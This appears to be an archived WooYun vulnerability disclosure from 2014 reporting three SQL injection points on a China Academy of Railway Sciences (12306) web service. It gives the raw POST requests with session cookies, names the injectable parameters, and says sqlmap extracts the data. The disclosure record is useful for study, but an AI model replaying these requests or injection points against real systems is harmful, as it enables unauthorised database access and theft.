乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-05-06: 细节已通知厂商并且等待厂商处理中 2014-05-06: 厂商已经确认,细节仅向厂商公开 2014-05-16: 细节向核心白帽子及相关领域专家公开 2014-05-26: 细节向普通白帽子公开 2014-06-05: 细节向实习白帽子公开 2014-06-20: 细节向公众公开
中国铁道科学研究院(12306)多处SQL注入漏洞
中国铁道科学研究院注入点:hyfw.12306.cn/hyinfo/action/JgxxAction_jsjjfl构造数据包:
POST /hyinfo/action/JgxxAction_jsjjfl HTTP/1.1Host: hyfw.12306.cnProxy-Connection: keep-aliveContent-Length: 6Accept: */*Origin: http://hyfw.12306.cnX-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://hyfw.12306.cn/hyinfo/action/JgxxAction_index?type=2Accept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8,en;q=0.6Cookie: TVvHsVfkbo=MDAwM2IyOWE2NjgwMDAwMDAwMDIwFnwgVT8xMzk5MzMyNjQw; JSESSIONID=3cyKTnzdgfCC1kvQD0plHnsHt0cvHXDKgXBJBfrpD5Xm91VjnTtL!182003097; JhVfuvhdaD=MDAwM2IyOWFhMDAwMDAwMDAwMDgwCx1OITUxMzk5MzI5NzE2; 0Bnf0WSH3k=MDAwM2IyNTNkYjAwMDAwMDAwMjIwRFUvU1UxMzk5MzMxMDc5lx=jzx
直接扔sqlmap即可注出第二处SQL注射:注入点:hyfw.12306.cn/hyinfo/action/JgxxAction_pmplxx注入参数:pm构造数据包
POST /hyinfo/action/JgxxAction_pmplxx HTTP/1.1Host: hyfw.12306.cnProxy-Connection: keep-aliveContent-Length: 46Accept: */*Origin: http://hyfw.12306.cnX-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://hyfw.12306.cn/hyinfo/action/JgxxAction_index?type=3Accept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8,en;q=0.6Cookie: TVvHsVfkbo=MDAwM2IyOWE2NjgwMDAwMDAwMDIwFnwgVT8xMzk5MzMyNjQw; JSESSIONID=3cyKTnzdgfCC1kvQD0plHnsHt0cvHXDKgXBJBfrpD5Xm91VjnTtL!182003097; JhVfuvhdaD=MDAwM2IyOWFhMDAwMDAwMDAwMDgwCx1OITUxMzk5MzI5NzE2; 0Bnf0WSH3k=MDAwM2IyNTNkYjAwMDAwMDAwMjIwRFUvU1UxMzk5MzMxMDc5pl=0260&pm=0110003&plfh=0260&pmfh=0110003&bs=1
SQLMAP即可注出第三处SQL注入点:注入点:http://hyfw.12306.cn/hyinfo/action/JgxxAction_hwyjl?lx=00
直接sqlmap
过滤注:什么都没做,求不查水表
危害等级:中
漏洞Rank:6
确认时间:2014-05-06 15:59
正在检查。
暂无